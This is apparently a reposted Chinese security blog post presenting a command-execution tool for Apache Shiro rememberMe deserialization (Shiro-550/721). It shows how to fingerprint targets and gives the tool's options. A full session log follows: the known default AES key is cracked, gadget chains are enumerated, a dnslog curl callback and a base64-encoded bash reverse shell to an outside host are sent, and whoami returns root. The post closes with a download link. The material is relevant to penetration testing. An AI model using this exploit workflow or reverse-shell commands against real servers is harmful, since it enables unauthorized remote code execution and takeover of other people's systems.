0x01 简介
Apache Shiro 是Java 的一个安全框架。Shiro 可以非常容易的开发出足够好的应用,其不仅可以用在JavaSE 环境,也可以用在JavaEE 环境。Shiro 可以帮助我们完成:认证、授权、加密、会话管理、与Web 集成、缓存等。
0x02 指纹识别&550和721区别
在请求包的Cookie中为?remeberMe字段赋任意值
返回包中存在set-Cookie:remeberMe=deleteMe
URL中有shiro字样
有时候服务器不会主动返回remeberMe=deleteMe,直接发包即可。
主要区别在于Shiro550使用已知默认密码,只要有足够的密码,不需要Remember Cookie
Shiro721的ase加密的key为系统随机生成,需要利用登录后的rememberMe去爆破正确的key值。利用有效的RememberMe Cookie作为Padding Oracle Attack的前缀,再去构造反序列化攻击
0x02 工具使用方法
> java -jar shiro_tool.jar
Usage: java -jar shiro_tool.jar https://xx.xx.xx.xx
nocheck --> skip check target is shiro or not.
skip --> all gadget default can be use
redirect --> follow redirect default:false
randomagent --> random useragent
notcheckall --> not check all gadget
useragent= --> set useragent
cookiename= --> default: rememberMe 不是rememberMe的时候用
x= --> print result
cmd= --> set command to run
dcmd= --> set command to run, command format base64 string
key= --> set a shiro key
req= --> request body file request body file 抓包保存到文件里,这里写文件名
keys= --> keys file 自定义key的文件,key按行分割,即每行写一个
java -cp shiro_tool.jar shiro.Check urls=批量url文件 redirect
java -cp shiro_tool.jar shiro.Check http://www.shiro.com
[//xx.xx.xx.xx/ ] java -jar shiro_tool.jar https:
[//xx.xx.xx.xx/ ] target: https:
[is use shiro ] target
[ ] start guess shiro key.
[ ] shiro key: kPH+bIxk5D2deZiIxcaaaA==
[ ] check URLDNS
[ ] find: URLDNS can be use
[ ] check CommonsBeanutils1
[ ] find: CommonsBeanutils1 can be use
[ ] check CommonsBeanutils2
[ ] check CommonsCollections1
[ ] check CommonsCollections2
[ ] check CommonsCollections3
[ ] check CommonsCollections4
[ ] check CommonsCollections5
[ ] check CommonsCollections6
[ ] check CommonsCollections7
[ ] check CommonsCollections8
[ ] check CommonsCollections9
[ ] check CommonsCollections10
[ ] check CommonsCollectionsK1
[ ] check CommonsCollectionsK2
[ ] check CommonsCollectionsK3
[ ] check CommonsCollectionsK4
[ ] check Groovy1
[ ] find: Groovy1 can be use
[ ] check JSON1
[ ] find: JSON1 can be use
[ ] check Spring1
[ ] find: Spring1 can be use
[ ] check Spring2
[ ] check JRMPClient
[ ] find: JRMPClient can be use
[ ] JRMPClient please use: java -cp shiro_tool.jar ysoserial.exploit.JRMPListener
0: URLDNS
1: CommonsBeanutils1
2: Groovy1
3: JSON1
4: Spring1
5: JRMPClient
[please enter the number(0-6) ]
3
[-] use gadget: JSON1
[*] command example: bash -i >& /dev/tcp/xx.xx.xx.xx/80 0>&1
[*] command example: curl dnslog.xx.com
[*] if need base64 command, input should startwith bash=/powershell=/python=/perl=
[ ] please enter command, input q or quit to quit
> curl json.dnslog.xx.cn
[ ] start process command: curl json.dnslog.xx.cn
[ ] please enter command, input q or quit to quit
> bash=bash -i >& /dev/tcp/xx.xx.xx.xx/80 0>&1
[ ] start process command: bash -c {echo,YmFzaD1iYXNoIC1pID4mIC9kZXYvdGNwL3h4Lnh4Lnh4Lnh4LzgwIDA+JjE=}|{base64,-d}|{bash,-i}
[ ] please enter command, input q or quit to quit
> output=on
[on. ] print payload mode
[ ] please enter command, enter q or quit to quit, enter back to re-choose gadget
> whoami
kPH+bIxk5D2deZiIxcaaaA== - CommonsBeanutils1 - zEC2T+ZP+ib2g+NLMrrU0LRsNu3lr7kjq
82987eI8FZxA8ckaX8LsMNHdParxVS9aYg0Oxl91WD5GztG6Dmg/QO/sjxi+kX/sFpHgqwtG4MCQoogH
Jkhnj73PI6Wn8AJWQyXoOGNMkyboGcEm0Ti1h+WMGQEqw57tRl7Pjr0pMr2oZcUj9huwC/Lfr090FX7v
rPrU5JnQm2Qo7ZrMPnxENXs0yMT6HfU75OejeF6kXbWTaGlvfByscF1ljoDR/k2txdQ1eK4nZ4ReOAqM
uUeeaXwirEw2kg58GktvB2Ghw4egXJBQUdP3H8iE+zrkf12YlPs/RAOq8w0mWfvwB7EnCW3Z83YP8vV1
+reLT9oNyUpCfjKyQVodnpZJY7If4F9al8He7E832RR3mhFvsjJDyNFTbB4TPrRqFDehSVuHib5qkh0s
0YjvCGErxDLH9pFS4G9rNYQeAnXBKeNzS5q2O0xCe5xg4X6l8R6XsU2/V1d6wd27U7u18+DJlo/v58vj
SyUtUaEAAuMN9C30Rr+r7Tk9MVC55eS8l82fURpUwttcRADhJ0esKHAFFAkwnisbAb4Uugz3IADojYlH
BNFtWFuV2dsuqkionEROKLIdVHJGR8URmk79v8lbLbpCWI3cTCf81SwwBoYylKXCyHX2X08VlEUvuHWk
ypx9gVvDuQQQFTGP4ljwpU1NlQPqxaLXmnZ5TyJN2sycL9s8VWMYls4uFATtMkpXXcwaQGFVjCzFrABv
[ ] please enter command, enter q or quit to quit, enter back to re-choose gadget
> x=whoami
root
[ ] please enter command, enter q or quit to quit, enter back to re-choose gadget
> quit
[ ] start process command: quit
[ ] quit
0x03 下载地址
项目地址:
https://www.aliyundrive.com/s/ALnnGVKfFT9
原文始发于微信公众号(琴音安全):shiro 反序列化命令执行辅助检测工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论